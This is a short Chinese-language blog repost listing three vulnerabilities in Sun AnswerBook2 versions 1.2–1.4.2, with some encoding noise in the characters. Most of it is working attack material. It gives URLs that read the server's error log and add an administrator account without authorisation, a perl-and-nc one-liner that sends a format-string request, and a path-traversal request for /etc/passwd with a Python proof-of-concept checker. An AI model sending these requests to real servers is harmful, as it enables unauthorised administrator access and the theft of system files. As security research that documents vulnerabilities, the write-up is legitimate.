一、未授權(quán)管理腳本訪問(wèn)漏洞：

1、受影響版本：

Sun-AnswerBook2? ? ?1.2-1.4.2

2、攻擊測(cè)試手段

http://a.b.c.d:8888/ab2/@AdminViewError#訪問(wèn)錯(cuò)誤日志?

http://a.b.c.d:8888/ab2/@AdminAddadmin?uid=foo&password=bar&re_password=bar#添加賬戶（密碼）

二、遠(yuǎn)程格式化字符串漏洞

1、受影響版本：

Sun-AnswerBook2? ? ?1.2-1.4.2

2、攻擊測(cè)試手段：

1 perl -e 'print"GET /";print"%x"x20;print" HTTP/1.0\r\n\r\n\r\n"' | nc localhost 8888

應(yīng)該可以看到如下報(bào)錯(cuò)：

http-8888 [23/Sep/2000:13:09:37 -0700] warning: send-file reports: The?
requested object "/usr/lib/ab2/data/docs/0fea19f580073656e642d66696c6520?
7265706f7274733a2054686520726571756573746564206f626a65637420222f7573722f6?
c69622f6162322f646174612f646f63732f" could not be opened!

三、任意文件讀取（有些HTTP-Proxy也有這個(gè)漏洞）：

直接連接connect漏洞主機(jī)的對(duì)應(yīng)的端口（）

發(fā)送Payload

1 GET /../../../../../../../../../etc/passwd HTTP/1.1\r\n\r\n

就可以得到對(duì)應(yīng)的文件內(nèi)容

?

參考巡風(fēng)的POC：

1 def check(ip, port, timeout): 2 try: 3 socket.setdefaulttimeout(timeout) 4 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 5 s.connect((ip, int(port))) 6 flag = "GET /../../../../../../../../../etc/passwd HTTP/1.1\r\n\r\n" 7 s.send(flag) 8 data = s.recv(1024) 9 s.close() 10 if 'root:' in data and 'nobody:' in data: 11 return u"漏洞" 12 except: 13 pass

?

轉(zhuǎn)載于:https://www.cnblogs.com/KevinGeorge/p/8087270.html

總結(jié)

以上是生活随笔為你收集整理的Sun公司的产品AnswerBook存在多种漏洞的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。